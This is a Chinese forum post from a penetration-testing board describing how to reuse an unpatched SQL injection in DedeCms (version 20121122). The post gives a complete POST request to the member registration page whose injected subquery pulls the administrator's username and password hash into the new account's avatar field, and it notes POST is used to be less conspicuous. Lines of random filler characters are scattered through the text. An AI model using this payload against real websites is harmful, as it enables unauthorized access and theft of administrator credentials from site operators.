中国网络渗透测试联盟
标题:
DedeCms SQL注射漏洞再利用
[打印本页]
作者:
admin
时间:
2012-12-5 10:03
标题:
DedeCms SQL注射漏洞再利用
dedecms版本 20121122
; Q% [! W6 Z; v
0 _& Y2 r! \% K$ X- ?9 R s4 N
需要magic_quotes_gpc=Off
/ ]4 H* z( ?1 G3 _. n! g
}! ]& x. J6 \4 c
应该是没有什么大危害的漏洞.
8 E5 O$ [# E0 ?+ G' Z, |! O
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
1 e8 T. z2 ]% q0 v
; l( L" P2 n. H. j- [6 K
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
1 i# ^+ R6 N2 O( j+ k
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
# G& Y$ `" `8 S+ B' Y
9 G* _7 G# A7 G0 j
http:///de/member/reg_new.php
/ a, v; ~& F, p# a
* w7 A6 T' \& u$ H9 ~
POST
2 T% x& T3 m9 D. L( y+ i4 N
3 k. ~1 a. b2 Q8 Q* i }. S
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
5 B3 a/ S" k1 y7 b% b$ ^
7 ?" \3 m5 s. M% P$ H# b. [
成功注册后,头像处里面有好玩的信息.
& E% z4 Y" r% p0 a: _# t
8 D+ V2 S; `. _/ O& F" _) J
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2